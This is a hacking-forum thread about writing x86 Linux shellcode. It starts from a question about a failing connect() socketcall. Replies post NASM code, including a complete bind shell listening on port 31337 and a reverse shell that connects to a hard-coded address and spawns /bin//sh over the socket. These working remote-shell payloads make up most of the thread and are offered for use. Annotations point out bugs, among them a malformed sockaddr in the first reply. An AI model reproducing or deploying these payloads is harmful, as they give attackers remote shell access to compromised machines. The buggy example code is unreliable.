
Thread: Shellcode for connect() Function

  1. #1
    Just burned his ISO
    Join Date
    Aug 2012
    Posts
    1

    Default Shellcode for connect() Function

    I am writing shellcode on BackTrack 5 R2 x86 running in Virtualbox and the registers prior to the int 0x80 syscall look like this:

    eax 0x66
    ecx 0x8e60558
    edx 0x0
    ebx 0x3

    which is set up for the connect() syscall. The value in the ecx register points to an argument array that contains:

    0x8e60558: 0x00000009 0x8e60583 0x00000010

    where 0x00000009 is the file descriptor, 0x8e60583 is the server struct pointer that points to:

    0x8e60583: 0x00000002 0x0000115c 0x0100007f

    which is:

    [address]: [AF_INET=2] [PORT=4444] [IP=127.0.0.1]

    I know that the file descriptor is correct and all of the constant values set up in the registers like storing 0x66 in eax (socketcall is syscall #102) are correct to the best of my knowledge yet when I run the code, which should return the connected socket FD in the eax register, it returns:

    eax: 0xffffff9b

    which is the error code for "network unreachable". What have I done incorrectly? Would it have anything to do with the network settings of VirtualBox?

    EDIT: This doesn't have anything to do with the endianness, as I have tried both network byte order and little endian.

  2. #2
    Senior Member savioboyz's Avatar
    Join Date
    Oct 2010
    Location
    Nigeria
    Posts
    118

    Default Re: Shellcode for connect() Function

    At the time of execution, did you have a socket server bound to that port (4444)?

    Based on your problem above, here's an example I wrote using BackTrack and NASM:

    I Hope this helps.

    Code:
    ; NASM, 32-bit Linux (i386 ABI): eax = syscall number, ebx/ecx/edx = args, int 0x80.
    ; socketcall (syscall 102) multiplexes the socket family: ebx = sub-call number,
    ; ecx = pointer to an argument array (built on the stack here).
    ; Not position-independent: `push sockstruct` below embeds the absolute link-time
    ; address of a .data symbol, so the code only works at the address it was linked for.
    section .text
        global _start
    
    ; _sys_exit: exit(ebx). ebx is not set here, so the status is whatever the last
    ; routine left in it (3 after _connect).
    _sys_exit:
        mov eax, 0x1		; exit is syscall #1
        int 0x80
    
    _socket:
    ; int _socket(int domain,int type,int protocol)
    ; Out: eax = new fd, or -errno (unchecked by the caller). Clobbers ebx, ecx.
        push 0x0		; protocol = 0
        push 0x1		; 1 = SOCK_STREAM
        push 0x2		; 2 = PF_INET
        mov ecx, esp	; ecx = &{domain, type, protocol}
        mov ebx, 0x1	; SYS_SOCKET sub-call
        mov eax, 102	; socketcall()
        int 0x80		; eax = fd or -errno
        add esp,12		; drop the three pushed args
        ret 
    
    _connect:
    ; int connect(int fd,const struct sockaddr *addr,socklen_t len)
    ; Expects eax = fd from _socket; a negative -errno would be pushed as the fd unchanged.
    ; Out: eax = 0 on success or -errno. Leaves ebx = 3.
        
        push 0x10		; len = 16 bytes = sizeof(struct sockaddr_in)
        push sockstruct	; &sockstruct (absolute address, see note at top)
        push eax		; fd returned by _socket
        mov ecx,esp		; ecx = &{fd, addr, len}
        mov ebx,0x3		; SYS_CONNECT sub-call
        mov eax,102    	; socketcall()
        int 0x80		; eax = 0 or -errno
        add esp,12		; drop the three pushed args
        ret
    
    _start:
        call _socket
        call _connect
    
        ;call sys_write
    
        call _sys_exit		; does not return
    
    
    section .data
    ; NOTE(review): struct sockaddr_in is {u16 sin_family; u16 sin_port; u32 sin_addr; u8 sin_zero[8]}.
    ; `dq 0x5c11,0x0100007f` emits two 8-byte quads (11 5c 00 00 00 00 00 00 | 7f 00 00 01 00 00 00 00),
    ; so the kernel sees sin_family = 0x5c11 (not AF_INET = 2), sin_port = 0 and sin_addr = 0;
    ; the bytes do not match the ('4444','127.0.0.1') the comment describes.
        sockstruct dq 0x5c11,0x0100007f	;('4444','127.0.0.1')
    Last edited by savioboyz; 08-10-2012 at 01:11 AM.
    Saviour Emmauel Ekiko

  3. #3
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Shellcode for connect() Function

    that shellcode will fail as shellcode, sorry

    try this
    Code:
    ; NASM, 32-bit Linux (i386 ABI): eax = syscall number, ebx/ecx/edx = args, int 0x80.
    ; Bind shell: socket -> bind -> listen -> accept -> dup2 x3 -> execve.  This syscall
    ; chain (socketcall sub-calls 1,2,4,5, then dup2 of the socket over fds 0-2, then
    ; execve of a shell) is the pattern seccomp/audit rules and syscall-tracing EDR
    ; key on for this payload class.
    ; Register roles: ebx = socketcall sub-call (incremented in sequence), edx = 0
    ; (null DWORD source), esi = listening socket fd. No syscall return is checked.
    BITS 32
    
    ; s = socket(2, 1, 0)
      push BYTE 0x66    ; socketcall is syscall #102 (0x66)
      pop eax
      cdq               ; eax is positive, so edx = 0; reused as a null DWORD below
      xor ebx, ebx      ; ebx is the type of socketcall
      inc ebx           ; 1 = SYS_SOCKET = socket() 
      push edx          ; Build arg array: { protocol = 0,
      push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
      push BYTE 0x2     ;                    AF_INET = 2 }
      mov ecx, esp      ; ecx = ptr to argument array
      int 0x80          ; after syscall, eax has socket file descriptor (or -errno, unchecked)
      
      mov esi, eax      ; save socket FD in esi for later
    
    ; bind(s, [2, 31337, 0], 16)
      push BYTE 0x66    ; socketcall (syscall #102) 
      pop eax
      inc ebx           ; ebx = 2 = SYS_BIND = bind()
      push edx          ; Build sockaddr_in:        sin_addr = INADDR_ANY = 0
      push WORD 0x697a  ;   (in reverse order)      sin_port = 31337 (network byte order)
      push WORD bx      ;                           sin_family = AF_INET = 2 (bx is the low word of ebx)
      mov ecx, esp      ; ecx = server struct pointer; only 8 bytes were built, the 8 bytes of
                        ; sin_zero are whatever sits above on the stack (presumably ignored for AF_INET)
      push BYTE 16      ; argv: { sizeof(server struct) = 16,
      push ecx          ;         server struct pointer,
      push esi          ;         socket file descriptor }
      mov ecx, esp      ; ecx = argument array
      int 0x80          ; eax = 0 on success
    
    ; listen(s, 0)
      mov BYTE al, 0x66 ; socketcall (syscall #102); writes al only, so assumes eax == 0 from bind
      inc ebx
      inc ebx           ; ebx = 4 = SYS_LISTEN = listen()
      push ebx          ; argv: { backlog = 4 (ebx reused as the value),
      push esi          ;         socket fd }
      mov ecx, esp      ; ecx = argument array
      int 0x80          ; eax = 0 on success
    
    ; c = accept(s, 0, 0)
      mov BYTE al, 0x66 ; socketcall (syscall #102); again assumes the upper bytes of eax are 0
      inc ebx           ; ebx = 5 = SYS_ACCEPT = accept()
      push edx          ; argv: { socklen = 0,
      push edx          ;         sockaddr ptr = NULL,
      push esi          ;         socket fd }
      mov ecx, esp      ; ecx = argument array
      int 0x80          ; eax = connected socket FD (blocks until a client connects)
    
    ; dup2(connected socket, {all three standard I/O file descriptors})
      mov ebx, eax      ; ebx = connected socket FD (the oldfd argument of dup2)
      push BYTE 0x3F    ; dup2  syscall #63
      pop eax
      xor ecx, ecx      ; ecx = 0 = standard input
      int 0x80          ; dup2(c, 0); returns 0, so the next `mov al` yields a clean eax
      mov BYTE al, 0x3F ; dup2  syscall #63
      inc ecx           ; ecx = 1 = standard output
      int 0x80          ; dup2(c, 1)
      mov BYTE al, 0x3F ; dup2  syscall #63
      inc ecx           ; ecx = 2 = standard error
      int 0x80          ; dup2(c, 2)
    
    ; execve(const char *filename, char *const argv [], char *const envp[])
      mov BYTE al, 11   ; execve  syscall #11 (eax was 2 from the last dup2)
      push edx          ; push some nulls for string termination
      push 0x68732f2f   ; push "//sh" to the stack
      push 0x6e69622f   ; push "/bin" to the stack
      mov ebx, esp      ; put the address of "/bin//sh" into ebx, via esp
      push edx          ; push 32-bit null terminator to stack
      mov edx, esp      ; this is an empty array for envp
      push ebx          ; push string addr to stack above null terminator
      mov ecx, esp      ; this is the argv array with string ptr
      int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL]); does not return on success
    Here's a reverse shell if you like...

    Code:
    ; NASM, 32-bit Linux (i386 ABI): eax = syscall number, ebx/ecx/edx = args, int 0x80.
    ; Reverse shell: socket -> connect(hard-coded IP:port) -> dup2 x3 -> execve.  An outbound
    ; connect followed by dup2 of the socket over fds 0-2 and execve of a shell is the
    ; sequence egress filtering, seccomp/audit rules and syscall-tracing EDR key on.
    ; Register roles: ebx = socketcall sub-call, edx = 0 (null DWORD source), esi = socket fd.
    BITS 32
    
    ; s = socket(2, 1, 0)
      push BYTE 0x66    ; socketcall is syscall #102 (0x66)
      pop eax
      cdq               ; eax is positive, so edx = 0; reused as a null DWORD below
      xor ebx, ebx      ; ebx is the type of socketcall
      inc ebx           ; 1 = SYS_SOCKET = socket() 
      push edx          ; Build arg array: { protocol = 0,
      push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
      push BYTE 0x2     ;                    AF_INET = 2 }
      mov ecx, esp      ; ecx = ptr to argument array
      int 0x80          ; after syscall, eax has socket file descriptor (or -errno, unchecked)
      
      xchg esi, eax     ; save socket FD in esi for later (eax takes esi's previous value)
    
    ; connect(s, [2, 31337, <IP address>], 16)
      push BYTE 0x66    ; socketcall (syscall #102) 
      pop eax
      inc ebx           ; ebx = 2 (needed for AF_INET)
      push DWORD 0x482aa8c0 ; Build sockaddr_in:     sin_addr = 192.168.42.72 (bytes c0 a8 2a 48 in memory)
      push WORD 0x697a  ;   (in reverse order)      sin_port = 31337 (network byte order)
      push WORD bx      ;                           sin_family = AF_INET = 2 (bx is the low word of ebx)
      mov ecx, esp      ; ecx = server struct pointer; only 8 bytes were built, sin_zero is
                        ; whatever sits above on the stack (presumably ignored for AF_INET)
      push BYTE 16      ; argv: { sizeof(server struct) = 16,
      push ecx          ;         server struct pointer,
      push esi          ;         socket file descriptor }
      mov ecx, esp      ; ecx = argument array
      inc ebx           ; ebx = 3 = SYS_CONNECT = connect()
      int 0x80          ; eax = 0 on successful connection, -errno otherwise
    
    ; NOTE(review): with the check below commented out, a failed connect leaves -errno in eax;
    ; the later `mov BYTE al, ...` writes replace only the low byte, so the dup2/execve
    ; syscall numbers are invalid and execution runs off the end of the code.
    ;  jz success        ; if connection successful, jump down to spawn shell
    ;  xor eax, eax      ; otherwise, exit cleanly
    ;  inc eax           ; eax = 1 exit (syscall #1)
    ;  xor ebx, ebx      ; status = 0  (nothing to see here)
    ;  int 0x80
    
    ;success:
    ; dup2(connected socket, {all three standard I/O file descriptors})
      xchg esi, ebx     ; put socket FD from esi into ebx (esi = 3)
      xchg ecx, esi     ; ecx = 3 (esi now holds the old argument-array pointer, unused after this)
      dec ecx           ; ecx starts at 2
    ;  xchg eax, esi     ; eax = 0x00000003  
    ;  push BYTE 0x2
    ;  pop ecx           ; ecx starts at 2
    ;dup_loop:
      mov BYTE al, 0x3F ; dup2  syscall #63 (assumes eax == 0 from a successful connect)
      int 0x80          ; dup2(c, 2) -> stderr; returns 2
      dec ecx           ; ecx = 1
      mov BYTE al, 0x3F ; dup2  syscall #63
      int 0x80          ; dup2(c, 1) -> stdout; returns 1
      dec ecx           ; ecx = 0
      mov BYTE al, 0x3F ; dup2  syscall #63
      int 0x80          ; dup2(c, 0) -> stdin; returns 0
      dec ecx           ; ecx = -1 here; harmless, ecx is reassigned before execve
     ; jns dup_loop      ; if the sign flag is not set, ecx is not negative
    
    ; execve(const char *filename, char *const argv [], char *const envp[])
      mov BYTE al, 11   ; execve  syscall #11 (eax was 0 from the last dup2)
      push edx          ; push some nulls for string termination
      push 0x68732f2f   ; push "//sh" to the stack
      push 0x6e69622f   ; push "/bin" to the stack
      mov ebx, esp      ; put the address of "/bin//sh" into ebx, via esp
      push edx          ; push 32-bit null terminator to stack
      mov edx, esp      ; this is an empty array for envp
      push ebx          ; push string addr to stack above null terminator
      mov ecx, esp      ; this is the argv array with string ptr
      int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL]); does not return on success
    Let me know if this works.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  4. #4
    Senior Member savioboyz's Avatar
    Join Date
    Oct 2010
    Location
    Nigeria
    Posts
    118

    Default Re: Shellcode for connect() Function

    "that shellcode will fail as shellcode, sorry"

    I assumed the original poster was already a shellcode writer, so I didn't intend to complete the code (a connection handler is obviously absent
    after the connect routine). I left it incomplete since the original poster didn't ask for complete code, but only asked for help with the part he was currently stuck on.

    Great work on the complete version; I guess that will prove more useful.
    Last edited by savioboyz; 08-10-2012 at 12:55 PM.
    Saviour Emmauel Ekiko

  5. #5
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Shellcode for connect() Function

    No worries. I was more concerned with the data section at the end since all shellcode needs to be inline... But it's still a good example.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  6. #6
    Senior Member savioboyz's Avatar
    Join Date
    Oct 2010
    Location
    Nigeria
    Posts
    118

    Default Re: Shellcode for connect() Function

    For how many years have you been writing shellcode?
    Last edited by savioboyz; 08-10-2012 at 01:28 PM.
    Saviour Emmauel Ekiko

  7. #7
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Shellcode for connect() Function

    For about five months, ever since I started working on my script here: http://www.backtrack-linux.org/forum...ad.php?t=51129
    World Domination is such an ugly phrase. I prefer the term World Optimization.

